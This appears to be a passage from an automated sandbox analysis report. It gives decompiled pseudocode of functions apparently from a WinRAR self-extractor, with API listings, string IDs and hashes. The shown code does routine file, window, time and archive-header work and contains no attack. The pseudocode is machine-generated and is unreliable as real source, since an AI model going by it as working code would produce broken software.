                • Instruction ID: 1af6b61379e815471a04d63a14f1dfe839c2385c3e3900704337ca1ed4851494
                • Opcode Fuzzy Hash: 28cb7eb694d4783e64508081f67741000ac72f7d5e2a05493dab13105b18246d
                • Instruction Fuzzy Hash: 89716C72A00619EFDB15DF64DD95DAEBBB9FF48711B1401AEE412A73A0CB30AD01CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E003D9382() {
                				void* _t32;
                				short _t33;
                				long _t35;
                				void* _t40;
                				short _t42;
                				void* _t66;
                				intOrPtr _t69;
                				void* _t76;
                				intOrPtr _t79;
                				void* _t81;
                				WCHAR* _t82;
                				void* _t84;
                				void* _t86;
                
                				E003EEB78(0x4028b1, _t84);
                				E003EEC50(0x503c);
                				_t82 =  *(_t84 + 8);
                				_t32 = _t84 - 0x4048;
                				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
                				if(_t32 == 0 || _t32 >= 0x800) {
                					L20:
                					_t33 = 0;
                					__eflags = 0;
                				} else {
                					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
                					if(_t35 == 0) {
                						goto L20;
                					} else {
                						_t91 = _t35 - 0x800;
                						if(_t35 >= 0x800) {
                							goto L20;
                						} else {
                							 *((intOrPtr*)(_t84 - 0x10)) = E003DC29A(_t91, _t84 - 0x4048);
                							_t78 = E003DC29A(_t91, _t84 - 0x5048);
                							_t69 = 0;
                							if( *_t39 == 0) {
                								goto L20;
                							} else {
                								_t40 = E003E1FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
                								_t93 = _t40;
                								if(_t40 == 0) {
                									goto L20;
                								} else {
                									_t42 = E003E1FBB(E003DC29A(_t93, _t82), _t78);
                									if(_t42 != 0) {
                										goto L20;
                									} else {
                										 *(_t84 - 0x1010) = _t42;
                										_t79 = 0;
                										while(1) {
                											_t95 = _t42;
                											if(_t42 != 0) {
                												break;
                											}
                											E003E0602(_t84 - 0x1010, _t82, 0x800);
                											E003D4092(E003DC29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
                											_t86 = _t86 + 0x10;
                											if(E003DA231(_t84 - 0x1010) == 0) {
                												_t42 =  *(_t84 - 0x1010);
                											} else {
                												_t42 = 0;
                												 *(_t84 - 0x1010) = 0;
                											}
                											_t79 = _t79 + 0x7b;
                											if(_t79 < 0x2710) {
                												continue;
                											} else {
                												_t98 = _t42;
                												if(_t42 == 0) {
                													goto L20;
                												} else {
                													break;
                												}
                											}
                											goto L21;
                										}
                										E003E0602(_t84 - 0x3048, _t82, 0x800);
                										_push(0x800);
                										E003DC310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
                										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
                											goto L20;
                										} else {
                											E003D9556(_t84 - 0x2048);
                											 *((intOrPtr*)(_t84 - 4)) = _t69;
                											if(E003DA231(_t82) == 0) {
                												_t69 = E003D966E(_t84 - 0x2048, _t82, 0x12);
                											}
                											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
                											if(_t69 != 0) {
                												E003D9620(_t84 - 0x2048);
                												E003D974E(_t84 - 0x2048);
                											}
                											E003D959A(_t84 - 0x2048);
                											_t33 = 1;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				L21:
                				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
                				return _t33;
                			}

















                APIs
                • __EH_prolog.LIBCMT ref: 003D9387
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003D93AA
                • GetShortPathNameW.KERNEL32 ref: 003D93C9
                  • Part of subcall function 003DC29A: _wcslen.LIBCMT ref: 003DC2A2
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • _swprintf.LIBCMT ref: 003D9465
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • MoveFileW.KERNEL32(?,?), ref: 003D94D4
                • MoveFileW.KERNEL32(?,?), ref: 003D9514
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                • String ID: rtmp%d
                • API String ID: 3726343395-3303766350
                • Opcode ID: 84333e47ccc77e4a3409c3208d3bcef3e7582561d49ee675503ceedc18e035a7
                • Instruction ID: 2b4aa9a7ae9183952a14e19f39690f1a27e7bf063704478fcbf6ac4be9a587f2
                • Opcode Fuzzy Hash: 84333e47ccc77e4a3409c3208d3bcef3e7582561d49ee675503ceedc18e035a7
                • Instruction Fuzzy Hash: 564153B2900259A6CF22EB61AD45FDE737DAF45340F0048B7B649A7251DB388B898B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 52%
                			E003D1100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v60;
                				short* _v64;
                				char* _v80;
                				intOrPtr _v84;
                				intOrPtr _v88;
                				char _v92;
                				char _v1114;
                				char _v1116;
                				void* __edi;
                				signed int _t44;
                				signed int _t52;
                				intOrPtr _t67;
                				short* _t80;
                				void* _t83;
                				char _t84;
                				signed int _t85;
                				void* _t87;
                				signed int _t97;
                
                				_t79 = _a16;
                				_t81 =  &_v1116;
                				if(_a16 != 0) {
                					E003E0602( &_v1116, _t79, 0x200);
                					_t87 =  &_v1114 + E003F3E13( &_v1116) * 2;
                					E003E0602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
                					_t81 = _t87 + E003F3E13(_t87) * 2 + 2;
                				}
                				E003E0602(_t81, E003DE617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
                				_t83 = _t81 + E003F3E13(_t81) * 2 + 2;
                				E003E0602(_t83, 0x4035f0, 0x200 - (_t83 -  &_v1116 >> 1));
                				_t44 = E003F3E13(_t83);
                				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
                				_t84 = 0x58;
                				E003EFFF0(_t79,  &_v92, 0, _t84);
                				_t67 = _a20;
                				_t80 = _a12;
                				_v88 = _a4;
                				_v84 =  *0x411028;
                				_v80 =  &_v1116;
                				_v44 = _a8;
                				_v92 = _t84;
                				_v64 = _t80;
                				_v60 = 0x800;
                				_v40 = 0x1080c;
                				_push( &_v92);
                				if(_t67 == 0) {
                					_t52 =  *0x433044();
                				} else {
                					_t52 =  *0x43303c();
                				}
                				_t85 = _t52;
                				if(_t85 == 0) {
                					_t52 =  *0x433040();
                					if(_t52 == 0x3002) {
                						 *_t80 = 0;
                						_push( &_v92);
                						if(_t67 == 0) {
                							_t52 =  *0x433044();
                						} else {
                							_t52 =  *0x43303c();
                						}
                						_t85 = _t52;
                					}
                					_t97 = _t85;
                				}
                				return _t52 & 0xffffff00 | _t97 != 0x00000000;
                			}
























                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: U>$p>$z>
                • API String ID: 176396367-3601670778
                • Opcode ID: f439ca8e0780f67698394a85f9f8ee6937ea5b005550de99926dddad652baa20
                • Instruction ID: cddb67e22cadef26aa21e29947ab25d734dc88b74d3fff2a47368af3e9e7049a
                • Opcode Fuzzy Hash: f439ca8e0780f67698394a85f9f8ee6937ea5b005550de99926dddad652baa20
                • Instruction Fuzzy Hash: FF41C9729006695BCB269F789D05AEFBBBCEF10311F00012AFD45F7245DB70AE458BA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E003E9ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                				struct tagRECT _v16;
                				intOrPtr _v28;
                				intOrPtr _v36;
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				struct HWND__* _t44;
                				intOrPtr* _t52;
                				void* _t60;
                				WCHAR* _t67;
                				struct HWND__* _t68;
                
                				_t68 = _a8;
                				_t52 = __ecx;
                				 *(__ecx + 8) = _t68;
                				 *((char*)(__ecx + 0x26)) = _a20;
                				ShowWindow(_t68, 0);
                				E003E9C04(_t52, _a4);
                				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
                					L003F3E2E( *((intOrPtr*)(_t52 + 0x1c)));
                				}
                				if(_a12 != 0) {
                					_push(_a12);
                					_t33 = E003F7625(_t52, _t60);
                				} else {
                					_t33 = 0;
                				}
                				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
                				if(_a16 != 0) {
                					_push(_a16);
                					_t34 = E003F7625(_t52, _t60);
                				} else {
                					_t34 = 0;
                				}
                				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
                				GetWindowRect(_t68,  &_v16);
                				 *0x433108(0,  *0x433154(_t68,  &_v16, 2));
                				if( *(_t52 + 4) != 0) {
                					 *0x433110( *(_t52 + 4));
                				}
                				_t40 = _v36;
                				_t20 = _t40 + 1; // 0x1
                				_t44 =  *0x433118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x433154(_t68, 0,  *_t52, _t52, _t60));
                				 *(_t52 + 4) = _t44;
                				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
                					__eflags = _t44;
                					if(_t44 != 0) {
                						ShowWindow(_t44, 5);
                						return  *0x43310c( *(_t52 + 4));
                					}
                				} else {
                					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
                						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
                						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
                							_t44 = E003E9CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
                							_t67 = _t44;
                							if(_t67 != 0) {
                								ShowWindow(_t68, 5);
                								SetWindowTextW(_t68, _t67);
                								return L003F3E2E(_t67);
                							}
                						}
                					}
                				}
                				return _t44;
                			}
















                APIs
                • ShowWindow.USER32(?,00000000), ref: 003E9EEE
                • GetWindowRect.USER32(?,00000000), ref: 003E9F44
                • ShowWindow.USER32(?,00000005,00000000), ref: 003E9FDB
                • SetWindowTextW.USER32(?,00000000), ref: 003E9FE3
                • ShowWindow.USER32(00000000,00000005), ref: 003E9FF9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: >$RarHtmlClassName
                • API String ID: 3937224194-3994152025
                • Opcode ID: 7c8d76e3b861e632b88041fbb7d2852b4d82a92bb9c77c750ae598cdd2d19f9a
                • Instruction ID: b23e45d8eabe77e674c1ad4ac79ed3205b5e9b1b8004a2c4e7c6ddce76e8eb59
                • Opcode Fuzzy Hash: 7c8d76e3b861e632b88041fbb7d2852b4d82a92bb9c77c750ae598cdd2d19f9a
                • Instruction Fuzzy Hash: 82410432004364EFDB229F66DC48B2B7BA8FF48702F004629F94999196CB74ED05CF65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E003E1218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
                				struct _SYSTEMTIME _v16;
                				struct _SYSTEMTIME _v32;
                				struct _SYSTEMTIME _v48;
                				struct _FILETIME _v56;
                				struct _FILETIME _v64;
                				intOrPtr* _v68;
                				struct _FILETIME _v76;
                				intOrPtr _v80;
                				signed int _t78;
                				long _t82;
                				signed int _t87;
                				signed int _t92;
                				void* _t93;
                				long _t94;
                				signed int _t96;
                				intOrPtr* _t97;
                				intOrPtr* _t98;
                				signed int* _t99;
                				void* _t100;
                				signed int _t101;
                
                				_t100 = __ebp;
                				_t94 = __edx;
                				_t97 = __ecx;
                				_v68 = __ecx;
                				_v80 = E003EF1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
                				_v76.dwLowDateTime = _t94;
                				if(E003DB146() >= 0x600) {
                					FileTimeToSystemTime( &_v64,  &_v32);
                					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
                					SystemTimeToFileTime( &_v16,  &_v76);
                					SystemTimeToFileTime( &_v32,  &_v56);
                					asm("sbb ecx, [esp+0x24]");
                					asm("sbb ecx, ebx");
                					asm("adc ecx, ebx");
                					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
                					asm("adc ecx, ebx");
                					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
                				} else {
                					FileTimeToLocalFileTime( &_v64,  &_v76);
                				}
                				_push(_t100);
                				FileTimeToSystemTime( &_v76,  &_v48);
                				_t99 = _a4;
                				_t92 = _v48.wDay & 0x0000ffff;
                				_t101 = _v48.wMonth & 0x0000ffff;
                				_t95 = _v48.wYear & 0x0000ffff;
                				_t99[3] = _v48.wHour & 0x0000ffff;
                				_t87 = _t92 - 1;
                				_t99[4] = _v48.wMinute & 0x0000ffff;
                				_t99[5] = _v48.wSecond & 0x0000ffff;
                				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
                				 *_t99 = _v48.wYear & 0x0000ffff;
                				_t99[1] = _t101;
                				_t99[2] = _t92;
                				_t99[8] = _t87;
                				_v76.dwLowDateTime = 1;
                				if(_t101 > 1) {
                					_t96 = _t87;
                					_t98 = 0x40e1a8;
                					_t93 = 4;
                					while(1) {
                						_t87 = _t96;
                						if(_t93 > 0x30) {
                							break;
                						}
                						_t93 = _t93 + 4;
                						_t87 =  *_t98 + _t96;
                						_t82 = _v76.dwLowDateTime + 1;
                						_t99[8] = _t87;
                						_t98 = _t98 + 4;
                						_v76.dwLowDateTime = _t82;
                						_t96 = _t87;
                						if(_t82 < _t101) {
                							continue;
                						}
                						break;
                					}
                					_t97 = _v68;
                					_t95 = _v48.wYear & 0x0000ffff;
                				}
                				if(_t101 > 2 && E003E13A4(_t95) != 0) {
                					_t99[8] = _t87 + 1;
                				}
                				_t78 = E003EF250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
                				_t99[6] = _t78;
                				return _t78;
                			}
























                APIs
                • __aulldiv.LIBCMT ref: 003E122E
                  • Part of subcall function 003DB146: GetVersionExW.KERNEL32(?), ref: 003DB16B
                • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 003E1251
                • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 003E1263
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 003E1274
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1284
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1294
                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003E12CF
                • __aullrem.LIBCMT ref: 003E1379
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: a5838706641af98234e9a57afcbb718cb37d31943a8eb1fcff58e0f9d287d741
                • Instruction ID: 55803608700551c370742e3469c61a967b2fc2a9a7579f438389225e75687b0e
                • Opcode Fuzzy Hash: a5838706641af98234e9a57afcbb718cb37d31943a8eb1fcff58e0f9d287d741
                • Instruction Fuzzy Hash: 1E4146B6408355AFC710DF65C88096BBBF9FF88315F008A2EF596C6250E738E609CB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003D2210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
                				char _v4;
                				signed char _v5;
                				char _v12;
                				char _v16;
                				signed char _t135;
                				char _t138;
                				signed int _t140;
                				unsigned int _t141;
                				signed int _t145;
                				signed int _t162;
                				signed int _t165;
                				signed int _t176;
                				signed char _t179;
                				signed char _t180;
                				signed char _t181;
                				signed int _t183;
                				signed int _t186;
                				signed int _t188;
                				signed int _t189;
                				signed char _t221;
                				signed char _t234;
                				signed int _t235;
                				signed int _t237;
                				intOrPtr _t240;
                				signed char _t244;
                				intOrPtr _t247;
                				signed char _t248;
                				signed char _t263;
                				signed int _t264;
                				signed int _t266;
                				intOrPtr _t273;
                				intOrPtr _t276;
                				intOrPtr _t279;
                				intOrPtr _t306;
                				intOrPtr _t311;
                				signed int _t313;
                				intOrPtr _t315;
                				signed char _t318;
                				char _t319;
                				void* _t320;
                				void* _t321;
                				void* _t322;
                				void* _t323;
                				void* _t324;
                				void* _t325;
                				void* _t326;
                				void* _t327;
                				void* _t328;
                				void* _t329;
                				void* _t330;
                				void* _t331;
                				void* _t332;
                				intOrPtr* _t334;
                				signed int _t337;
                				signed int _t338;
                				intOrPtr _t340;
                				void* _t341;
                				signed int _t345;
                				signed int _t348;
                				signed int _t361;
                
                				_t313 = __edx;
                				E003EEC50(0x20ac);
                				_t315 = _a8368;
                				_a12 = __ecx;
                				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
                				if(_t135 <  *(_t315 + 0x1c)) {
                					L96:
                					return _t135;
                				}
                				 *(_t315 + 0x1c) = _t135;
                				if(_a8372 >= 2) {
                					_t240 = _a8376;
                					while(1) {
                						_t135 = E003DCCFB();
                						_t244 = _t135;
                						_t345 = _t313;
                						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
                							break;
                						}
                						_t318 =  *(_t315 + 0x1c);
                						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
                						if(_t135 == 0) {
                							break;
                						}
                						_t348 = _t313;
                						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
                							break;
                						} else {
                							_a8 = _t318 + _t244;
                							_t138 = E003DCCFB();
                							_t337 = _t313;
                							_t319 = _t138;
                							_t313 = _a8;
                							_t247 = _t313 -  *(_t315 + 0x1c);
                							_a20 = _t247;
                							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
                								 *((char*)(_t240 + 0x1e)) = _t138;
                								_t234 = E003DCCFB();
                								_a16 = _t234;
                								if((_t234 & 0x00000001) != 0) {
                									_t237 = E003DCCFB();
                									if((_t237 | _t313) != 0) {
                										_t311 = _a12;
                										asm("adc ecx, edx");
                										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
                										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
                									}
                									_t234 = _a16;
                								}
                								if((_t234 & 0x00000002) != 0) {
                									_t235 = E003DCCFB();
                									if((_t235 | _t313) != 0) {
                										_t306 = _a12;
                										asm("adc ecx, edx");
                										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
                										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
                									}
                								}
                								_t247 = _a20;
                								_t313 = _a8;
                							}
                							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
                								_t361 = _t337;
                								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
                									goto L94;
                								} else {
                									_t320 = _t319 - 1;
                									if(_t320 == 0) {
                										_t140 = E003DCCFB();
                										__eflags = _t140;
                										if(_t140 == 0) {
                											_t141 = E003DCCFB();
                											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
                											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
                											_t145 = E003DCBAF(_t315) & 0x000000ff;
                											 *(_t240 + 0x10ec) = _t145;
                											__eflags = _t145 - 0x18;
                											if(_t145 > 0x18) {
                												E003D4092( &_a28, 0x14, L"xc%u", _t145);
                												_t341 = _t341 + 0x10;
                												E003D403D(_a12, _t240 + 0x28,  &_a28);
                											}
                											E003DCC5D(_t315, _t240 + 0x10a1, 0x10);
                											E003DCC5D(_t315, _t240 + 0x10b1, 0x10);
                											__eflags =  *(_t240 + 0x10c1);
                											if( *(_t240 + 0x10c1) != 0) {
                												_t321 = _t240 + 0x10c2;
                												E003DCC5D(_t315, _t321, 8);
                												E003DCC5D(_t315,  &_a16, 4);
                												E003E0016( &_a52);
                												_push(8);
                												_push(_t321);
                												_push( &_a48);
                												E003E005C();
                												_push( &_v4);
                												E003DFF33( &_a36);
                												_t162 = E003F0C4A( &_v16,  &_v12, 4);
                												_t341 = _t341 + 0xc;
                												asm("sbb al, al");
                												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
                												 *(_t240 + 0x10c1) =  ~_t162 + 1;
                												if( *((intOrPtr*)(_t240 + 4)) == 3) {
                													_t165 = E003F0C4A(_t321, 0x4036a8, 8);
                													_t341 = _t341 + 0xc;
                													__eflags = _t165;
                													if(_t165 == 0) {
                														 *(_t240 + 0x10c1) = _t165;
                													}
                												}
                											}
                											 *((char*)(_t240 + 0x10a0)) = 1;
                											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
                											 *((char*)(_t240 + 0x109b)) = 1;
                										} else {
                											E003D4092( &_a28, 0x14, L"x%u", _t140);
                											_t341 = _t341 + 0x10;
                											E003D403D(_a12, _t240 + 0x28,  &_a28);
                										}
                										goto L94;
                									}
                									_t322 = _t320 - 1;
                									if(_t322 == 0) {
                										_t176 = E003DCCFB();
                										__eflags = _t176;
                										if(_t176 != 0) {
                											goto L94;
                										}
                										_push(0x20);
                										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
                										_push(_t240 + 0x1074);
                										L37:
                										E003DCC5D(_t315);
                										goto L94;
                									}
                									_t323 = _t322 - 1;
                									if(_t323 == 0) {
                										__eflags = _t247 - 5;
                										if(_t247 < 5) {
                											goto L94;
                										}
                										_t179 = E003DCCFB();
                										_a3 = _t179;
                										_t180 = _t179 & 0x00000001;
                										_t263 = _a3;
                										_a4 = _t180;
                										_t313 = _t263 & 0x00000002;
                										__eflags = _t313;
                										_a5 = _t313;
                										if(_t313 != 0) {
                											_t279 = _t315;
                											__eflags = _t180;
                											if(__eflags == 0) {
                												E003E15BB(_t240 + 0x1040, E003DCC3D(_t279, __eflags), _t313);
                											} else {
                												E003E158F(_t240 + 0x1040, E003DCBFB(_t279), 0);
                											}
                											_t263 = _a3;
                											_t180 = _a4;
                										}
                										_t264 = _t263 & 0x00000004;
                										__eflags = _t264;
                										_a6 = _t264;
                										if(_t264 != 0) {
                											_t326 = _t240 + 0x1048;
                											_t276 = _t315;
                											__eflags = _t180;
                											if(__eflags == 0) {
                												E003E15BB(_t326, E003DCC3D(_t276, __eflags), _t313);
                											} else {
                												E003E158F(_t326, E003DCBFB(_t276), 0);
                											}
                										}
                										_t181 = _a3;
                										_t266 = _t181 & 0x00000008;
                										__eflags = _t266;
                										_a7 = _t266;
                										if(_t266 == 0) {
                											__eflags = _a4;
                											if(_a4 == 0) {
                												goto L94;
                											}
                											goto L72;
                										} else {
                											__eflags = _a4;
                											_t325 = _t240 + 0x1050;
                											_t273 = _t315;
                											if(__eflags == 0) {
                												E003E15BB(_t325, E003DCC3D(_t273, __eflags), _t313);
                												goto L94;
                											}
                											E003E158F(_t325, E003DCBFB(_t273), 0);
                											_t181 = _v5;
                											L72:
                											__eflags = _t181 & 0x00000010;
                											if((_t181 & 0x00000010) != 0) {
                												__eflags = _a5;
                												if(_a5 == 0) {
                													_t338 = 0x3fffffff;
                													_t324 = 0x3b9aca00;
                												} else {
                													_t188 = E003DCBFB(_t315);
                													_t338 = 0x3fffffff;
                													_t324 = 0x3b9aca00;
                													_t189 = _t188 & 0x3fffffff;
                													__eflags = _t189 - 0x3b9aca00;
                													if(_t189 < 0x3b9aca00) {
                														E003E1208(_t240 + 0x1040, _t189, 0);
                													}
                												}
                												__eflags = _a6;
                												if(_a6 != 0) {
                													_t186 = E003DCBFB(_t315) & _t338;
                													__eflags = _t186 - _t324;
                													if(_t186 < _t324) {
                														E003E1208(_t240 + 0x1048, _t186, 0);
                													}
                												}
                												__eflags = _a7;
                												if(_a7 != 0) {
                													_t183 = E003DCBFB(_t315) & _t338;
                													__eflags = _t183 - _t324;
                													if(_t183 < _t324) {
                														E003E1208(_t240 + 0x1050, _t183, 0);
                													}
                												}
                											}
                											goto L94;
                										}
                									}
                									_t327 = _t323 - 1;
                									if(_t327 == 0) {
                										__eflags = _t247 - 1;
                										if(_t247 >= 1) {
                											E003DCCFB();
                											__eflags = E003DCCFB();
                											if(__eflags != 0) {
                												 *((char*)(_t240 + 0x10f3)) = 1;
                												E003D4092( &_a28, 0x14, L";%u", _t204);
                												_t341 = _t341 + 0x10;
                												E003E05DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
                											}
                										}
                										goto L94;
                									}
                									_t328 = _t327 - 1;
                									if(_t328 == 0) {
                										 *((intOrPtr*)(_t240 + 0x1100)) = E003DCCFB();
                										 *(_t240 + 0x2104) = E003DCCFB() & 0x00000001;
                										_t329 = E003DCCFB();
                										_a172 = 0;
                										__eflags = _t329 - 0x1fff;
                										if(_t329 < 0x1fff) {
                											E003DCC5D(_t315,  &_a172, _t329);
                											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
                										}
                										E003DC335( &_a172,  &_a172, 0x2000);
                										_push(0x800);
                										_push(_t240 + 0x1104);
                										_push( &_a160);
                										E003E1C3B();
                										goto L94;
                									}
                									_t330 = _t328 - 1;
                									if(_t330 == 0) {
                										_t221 = E003DCCFB();
                										_a16 = _t221;
                										_t339 = _t240 + 0x2108;
                										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
                										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
                										 *((char*)(_t240 + 0x2208)) = 0;
                										 *((char*)(_t240 + 0x2108)) = 0;
                										__eflags = _t221 & 0x00000001;
                										if((_t221 & 0x00000001) != 0) {
                											_t332 = E003DCCFB();
                											__eflags = _t332 - 0xff;
                											if(_t332 >= 0xff) {
                												_t332 = 0xff;
                											}
                											E003DCC5D(_t315, _t339, _t332);
                											_t221 = _a8;
                											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
                										}
                										__eflags = _t221 & 0x00000002;
                										if((_t221 & 0x00000002) != 0) {
                											_t331 = E003DCCFB();
                											__eflags = _t331 - 0xff;
                											if(_t331 >= 0xff) {
                												_t331 = 0xff;
                											}
                											E003DCC5D(_t315, _t240 + 0x2208, _t331);
